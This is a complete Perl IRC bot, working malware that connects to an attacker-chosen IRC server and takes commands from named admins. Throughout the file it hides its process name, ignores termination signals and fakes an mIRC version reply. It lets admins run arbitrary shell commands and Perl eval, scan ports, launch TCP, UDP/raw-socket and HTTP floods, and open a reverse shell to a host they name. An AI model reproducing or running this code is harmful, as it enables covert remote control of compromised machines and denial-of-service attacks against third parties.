#!/usr/bin/perl

use LWP::UserAgent;

my $linas_max = '5';
my $sleep = '7';
my $VERSAO = "2.3.4-1";

$servidor = $ARGV[0] unless $servidor;
my $porta = $ARGV[1];
my $nick = $ARGV[2];
my $ircname = $ARGV[3];
my @canais = ('#'.$ARGV[4]);
my @adms = ($ARGV[5]);
my $processo = $ARGV[6];
chop (my $realname = `hostname`);

my $success   = "\n [+] Bot Shell\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n\n";
my $failed    = "\n [?] perl $0 <irchost> <port> <nick> <ident> <chan> <admin> <fakeproc>\n\n";

if (@ARGV != 7) { print $failed; exit(); } else { print $success; }

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}

my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!bht)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1", "$pn");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
}
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick-".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal");
         sendraw("PRIVMSG @adms :You Are My Master");
       }
   }
}

sub bfunc {
  my $msgpriv = "$_[2]";
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^nick (.*)/) {
              sendraw($IRC_cur_socket, "NICK ".$1);
              $nick=$1;
           }
           if ($funcarg =~ /^join (.*)/) {
              sendraw($IRC_cur_socket, "JOIN ".$1);
           }
           if ($funcarg =~ /^part (.*)/) {
              sendraw($IRC_cur_socket, "PART ".$1);
           }
           if ($funcarg =~ /^msg\s+(\S+) (.*)/) {
              sendraw($IRC_cur_socket, "PRIVMSG ".$1." :".$2);
           }
           if ($funcarg =~ /^op (.*)/) {
              sendraw($IRC_cur_socket, "MODE $printl +o ".$1);
           }
           if ($funcarg =~ /^deop (.*)/) {
              sendraw($IRC_cur_socket, "MODE $printl -o ".$1);
           }
           if ($funcarg =~ /^voice (.*)/) {
              sendraw($IRC_cur_socket, "MODE $printl +v ".$1);
           }
           if ($funcarg =~ /^die (.*)/) {
              sendraw($IRC_cur_socket, "QUIT :".$1);
              $killd = "kill -9 ".fork;
              system (`$killd`);
           }
           if ($funcarg =~ /^devoice (.*)/) {
              sendraw($IRC_cur_socket, "MODE $printl -v ".$1);
           }
           if ($funcarg =~ /^say (.*)/) {
              sendraw($IRC_cur_socket, "PRIVMSG $printl :".$1);
           }
           if ($funcarg =~ /^reset(.*)/) {
              sendraw($IRC_cur_socket, "QUIT :Di3 for my Master");
           }
           if ($funcarg =~ /^die(.*)/) {
              if ($1 eq ""){
                 sendraw($IRC_cur_socket, "QUIT :Di3 for my Master");
                 $killd = "kill -9 ".fork;
                 system (`$killd`);
              }
           }

           if ($funcarg =~ /^tsunami\s+(\d+)\s+(.*)/) {
             for (my $dx=0; $dx<=$1; $dx++)
             {
              my @nickxxxx = ("\\","|","_","-","`","^","{","}","[","]");
              $nickfgv = $nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx];
              $msgflood = "";
              $msgflood = $msgflood.$msgflood;
              sendraw($IRC_cur_socket, "NICK ".$nickfgv);
              sleep 10;
              sendraw($IRC_cur_socket, "PRIVMSG ".$2." :".$msgflood);
              sleep 2;
              sendraw($IRC_cur_socket, "NOTICE ".$2." :".$msgflood);
             }
              sendraw($IRC_cur_socket, "NICK ".$nick);
           }
           if ($funcarg =~ /^help(.*)/) {
              if ($printl eq "$msgpriv"){
                $msghelp ="PRIVMSG $msgpriv";
              }else{
                $msghelp ="NOTICE $msgpriv";
              }
              sendraw($IRC_cur_socket, $msghelp." :15(7@2Command List @adms15)");
              sendraw($IRC_cur_socket, $msghelp." :15(7@2Copyright (C) 200715)");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :12<------------------------------------------------>");
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2help15)");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2portscan15) <IP/domain Name>");
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2udpflood15) <IP> <packet-size> <time>");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2tcpflood15) <IP> <port> <time>");
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2httpflood15) <www.website.com> <time>");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2say15) <msg>");
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2join15) <#>");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2part15) <#>");
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2nick15) <nick>");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2msg15) <#/nick>");
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2tsunami15) <banyak pesan> <#/nick> <msg>");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2op15) <nick>");
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2deop15) <nick>");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2voice15) <nick>");
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2devoice15) <nick>");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2reset15)");
              sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2die15) <msg>");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :".$nick." 15(7@2back15) <ip> <port>");
              sendraw($IRC_cur_socket, $msghelp." :".$nick." 15(7@2command˛ di atas15)");
              sleep 2;
              sendraw($IRC_cur_socket, $msghelp." :12<------------------------------------------------>");
           }
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","9997","10000","12345","19150","27374","31310","33133","33733","55555");
             my (@aberta, %porta_banner);
             sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Portscan15)12 Scanning4 ".$1." 12for open ports.");
             foreach my $porta (@portas){
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2ScanPort15)12 Open port(s):4 @aberta");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :15(7@2ScanPort15)12 No open ports found.");
             }
           }
           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/){
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP DDoSing15)12 Attacking4 ".$1.":".$2." 12for4 ".$3." 12seconds.");
     my $itime = time;
     my ($cur_time);
             $cur_time = time - $itime;
     while ($3>$cur_time){
             $cur_time = time - $itime;
     &tcpflooder("$1","$2","$3");
             }
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP DDoSing15)12 Attack done4 ".$1.":".$2.".");
           }
   if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Version15)12 mIRC324 ".$VERSAO." 12K.Mardam-Bey");
}

if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);

  sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2BackConnect15)4: 12Connecting to4 $host:$porta");

}

  if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP DDoSing15)12 Attacking4 ".$1.":80 12for4 ".$2." 12seconds.");
     my $itime = time;
     my ($cur_time);
             $cur_time = time - $itime;
     while ($2>$cur_time){
             $cur_time = time - $itime;
     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
     close($socket);
             }
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP15)12 Attacking done4 ".$1.".");
           }
           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP DDoSing15)12 Attacking4 ".$1." 12with4 ".$2." 12Kb packets for4 ".$3." 12seconds.");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP15)12 Sent4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1.".");
           }
           exit;
       }
  }
}

sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   }
   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}

sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}

sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;

  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65000; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
       }
 }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}